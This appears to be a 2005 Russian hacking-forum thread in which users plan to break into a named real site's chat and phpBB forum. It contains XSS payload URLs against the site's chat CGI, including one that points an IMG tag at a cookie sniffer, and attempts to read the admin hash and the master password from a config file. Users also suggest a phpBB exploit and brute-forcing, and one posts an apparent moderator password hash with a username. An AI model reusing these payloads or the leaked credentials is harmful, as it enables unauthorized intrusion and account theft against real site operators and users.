Какие дыры у него есть?

Discussion in 'Песочница' started by Razial, 25 Dec 2005.

  1. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/XXX/);</script>

    подставь сниффер и закодируй в URL
     
    1 person likes this.
  3. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Поставил сниффер а как URL закодировать,
    и ещё когда кидаю ссылку на снифер открывается новое окно ив нем загружаеться сниффер, поэтому в поле REFERRER нифига нет!
     
    #3 Razial, 26 Dec 2005
    Last edited: 26 Dec 2005
  4. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Вот если я подставляю снифер:
    http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<IMG src=адрес сниффера>

    а дальше чё???

    вот ещё
    http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=userinfo&infoabout=<IMG%20src%3Dадрес>
     
    #4 Razial, 27 Dec 2005
    Last edited: 27 Dec 2005
  5. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    я поподробнее посмотрел, там куки красть бесполезно, нужна сессия
     
  6. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    И как узнать сессию?
    Кстати там чтобы кикать, банить, короче для всего нужен мастерпароль который валяется по адресу
    http://www.nerungri.ru/cgi-bin/chat/config.cgi
    его оттуда никак не достать?
     
    #6 Razial, 27 Dec 2005
    Last edited: 27 Dec 2005
  7. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
  8. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Это получчается он сессию выводит, только вот чью? и какое это имеет отношение к чату?
     
    #8 Razial, 28 Dec 2005
    Last edited: 28 Dec 2005
  9. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    нет, сейчас он выводит хэш админа http://www.nerungri.ru/phpbb/ но иногда пароли совпадают..... ты знаешь вообще модеров там каких нибуть?
     
  10. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Nikita, RaKoT, 1inch
     
  11. xdx

    xdx Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    91
    Likes Received:
    24
    Reputations:
    3
    Хакни phpbb сплойтом выдерешь пасс админа и поцепочно
     
  12. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    я не смог пробрутить, онлайн сервисы тоже сдались
     
  13. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    А можно как нить из конфига чата пароль достать(он не зашифрованный) как ты сделал с форумом
     
  14. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
  15. Razial

    Razial New Member

    Joined:
    25 Dec 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    b59c67bf196a4758191e42f76670ceba
    -
    пароль модера

    1inch
    -
    имя модера
     
  16. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    вот только этого модера нету в чате, или ник у него другой....
    Я не знаю, в Sql должна быть какая-нить возможность просмотра локальных файлов.